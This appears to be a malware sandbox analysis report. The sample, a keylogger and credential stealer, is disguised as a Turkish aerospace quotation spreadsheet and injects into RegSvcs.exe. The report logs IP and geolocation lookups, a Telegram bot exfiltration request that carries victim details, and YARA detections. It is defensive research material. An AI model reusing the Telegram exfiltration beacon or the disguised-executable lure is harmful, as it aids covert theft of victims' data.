Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 13:37:28.083249092 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 16, 2024 13:37:29.183563948 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 12:37:29 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 138ba724a96b9efc89b68ec28f526023
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49725 | 193.122.130.0 | 80 | 4780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 13:37:31.004462004 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 16, 2024 13:37:32.101073980 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 12:37:31 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: f7439651186c4c4d41159b3620646240
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49706 | 104.21.67.152 | 443 | 4780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:37:10 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-12-16 12:37:10 UTC | 870 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 12:37:10 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 341399
Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SEegHayPT3UxEQbB8MVuxV234dSFpuvfDR5z4u7krdvNeJZ97VJKZm5NRR17FULXs8R63MQwEQETbC0V7r1J5Ys985HDoY4Upf1zZcZlHEP1Bn95gUXGNh9iNoXQD8Zzm9pPsvxR"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f2eb9268a2641f5-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1583&rtt_var=609&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1773997&cwnd=211&unsent_bytes=0&cid=5d61606ef27a7fab&ts=455&x=0"
2024-12-16 12:37:10 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49707 | 104.21.67.152 | 443 | 4780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:37:12 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2024-12-16 12:37:12 UTC | 886 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 12:37:12 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 341401
Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wfk6hnj3jmI2PyS2U%2BtoY1%2BQBV8QwNJ03IWwWrkjKD%2Fk1a5XHDo%2BflZXuul6iBor35o4Xkl87SYEd%2Fi3xVEt%2FEiADIpa92WmNMSSuZLHy3VW4Gfyc%2FuzEmkd%2B22Bl5UkDao0F8Sb"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f2eb933289b5e86-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1702&min_rtt=1693&rtt_var=653&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1651583&cwnd=240&unsent_bytes=0&cid=d5ed44d40e6ab4c2&ts=455&x=0"
2024-12-16 12:37:12 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49709 | 104.21.67.152 | 443 | 4780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:37:15 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2024-12-16 12:37:15 UTC | 882 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 12:37:15 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 341404
Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f2zpBggZoECSfl%2B0GkTgjT%2FbHJm4o0ZrVIFiq8R6xAU4lorjs6eQX59DhXMXEBC849UGSRfq%2Bm5olgjjQrRgMg5bcJEQCDv%2F0H1%2B1CdL%2F99D6HCZgsOPpQbKzvOiPlafV45MBefb"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f2eb9454aba43d5-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1576&rtt_var=604&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1793611&cwnd=241&unsent_bytes=0&cid=1238ece7d21c3962&ts=462&x=0"
2024-12-16 12:37:15 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49711 | 104.21.67.152 | 443 | 4780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:37:18 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-12-16 12:37:19 UTC | 881 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 12:37:19 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 341408
Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wiwVZnR%2Fgaf4RKUDo3eespuSd9bs8fxWhocuGBkq%2FWXbnQnIVQgg2%2FsnGb5Fg3gCsS%2BfOKhABkM%2BvQ2CIbMzB%2BLvS04k3KbzlVRLzDJHF0TQaACjyaKDGgIXLBJoYbBH7eBetQbG"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f2eb95a7ec40f3a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1506&min_rtt=1506&rtt_var=753&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4238&recv_bytes=699&delivery_rate=187528&cwnd=164&unsent_bytes=0&cid=901b5eadf82c99d2&ts=467&x=0"
2024-12-16 12:37:19 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49713 | 104.21.67.152 | 443 | 4780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:37:21 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-12-16 12:37:22 UTC | 886 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 12:37:22 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 341411
Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MQhFd%2B%2FrecEzNTOaGkKh4BSvBm9VWAX2O6QjZVdfgtwYxxDdoRG5%2F3oqOg5Ss2Of66z3AE%2BQli%2B%2F2uIQ9d25u87GlIcAYBkwcWcm4cyZ3uvSz5xM%2F%2BPVanUv2fIWMfiLHSOuxKL5"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f2eb96c8b8443d9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1601&rtt_var=618&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1746411&cwnd=221&unsent_bytes=0&cid=b7af28b97af3b459&ts=454&x=0"
2024-12-16 12:37:22 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 5 | Source IP: 192.168.2.8 | Source Port: 49717 | Destination IP: 104.21.67.152 | Destination Port: 443 | PID: 4780 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:37:24 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-12-16 12:37:25 UTC | 878 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 12:37:24 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 341413
Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M07Izq%2BN6Ltr9y61HC6h1gro0JF%2Bd%2FOFLvge57gAuMdHtS3J39uzCKPb2jqMCH6E9WOYbEdVaulyuIgL8cLk4ueqQoiSc%2BReDHSaR0Hf9RAmOxN4F6RRhLgxKZ7HImYEKKlgEHMv"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f2eb97eab378cc0-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1813&min_rtt=1806&rtt_var=691&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1567364&cwnd=219&unsent_bytes=0&cid=2b888787a645696b&ts=456&x=0"
2024-12-16 12:37:25 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 6 | Source IP: 192.168.2.8 | Source Port: 49721 | Destination IP: 104.21.67.152 | Destination Port: 443 | PID: 4780 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:37:27 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2024-12-16 12:37:27 UTC | 874 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 12:37:27 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 341416
Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0YgWlEDFVLUgi1TO0SbaZE9gp2mOO6wrG8QGuUL17pKAvTdZ%2B1EHsYPI2sMdPu75Munuu3%2FVFcNzEi60e6LzOj08ieIFsS6cqkCC334r7m2FqfxgHR7l6tABQzYucTMBeL0ICxFg"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f2eb990bc194225-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1583&rtt_var=594&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1841109&cwnd=235&unsent_bytes=0&cid=c928443becc101a2&ts=450&x=0"
2024-12-16 12:37:27 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 7 | Source IP: 192.168.2.8 | Source Port: 49724 | Destination IP: 104.21.67.152 | Destination Port: 443 | PID: 4780 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:37:30 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-12-16 12:37:30 UTC | 876 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 12:37:30 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 341419
Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6ALlHY5IAoj6S1uVmpKoof65dmUiYPnxVCf8ZIvPky6YUOkHbVJEVlirJB0gV0J%2F3QOOpHwJ1ezNyCi3kx19YlhIjF46Sfu5Zd6eMYQwjFYPla%2FEPI7W4euPbZfDo%2FIU34TP54CL"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f2eb9a2f826434b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1604&rtt_var=602&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1820448&cwnd=243&unsent_bytes=0&cid=c80a53bb0493dda2&ts=485&x=0"
2024-12-16 12:37:30 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 8 | Source IP: 192.168.2.8 | Source Port: 49726 | Destination IP: 104.21.67.152 | Destination Port: 443 | PID: 4780 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:37:33 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-12-16 12:37:33 UTC | 869 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 12:37:33 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 341422
Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LfbPJDyDH8uVtIeEDOI0uYwtaEojB1tbw8fqDN8aSoUqOtUla1KUGUz7s2ClKvjMhwFllS1Lphlbo1IJ3yzaQOmh2ZRBGEJiMnJpdOfyMeS64bfbqOPKwnnwp0baKeWybckb9FZq"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f2eb9b4fb6df78d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1478&min_rtt=1469&rtt_var=570&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1887524&cwnd=55&unsent_bytes=0&cid=f72c0368216fe55c&ts=455&x=0"
2024-12-16 12:37:33 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 9 | Source IP: 192.168.2.8 | Source Port: 49727 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 4780 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:37:35 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:767668%0D%0ADate%20and%20Time:%2017/12/2024%20/%2011:29:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20767668%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-12-16 12:37:35 UTC | 344 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Mon, 16 Dec 2024 12:37:35 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 12:37:35 UTC | 55 | IN | Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Target ID: 0
Start time: 07:37:03
Start date: 16/12/2024
Path: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
Imagebase: 0xfa0000
File size: 1'029'120 bytes
MD5 hash: E984D47DDDDD227739D93D4712EEC8FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
• Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation: low
Has exited: true

Target ID: 2
Start time: 07:37:04
Start date: 16/12/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
Imagebase: 0x3a0000
File size: 45'984 bytes
MD5 hash: 9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
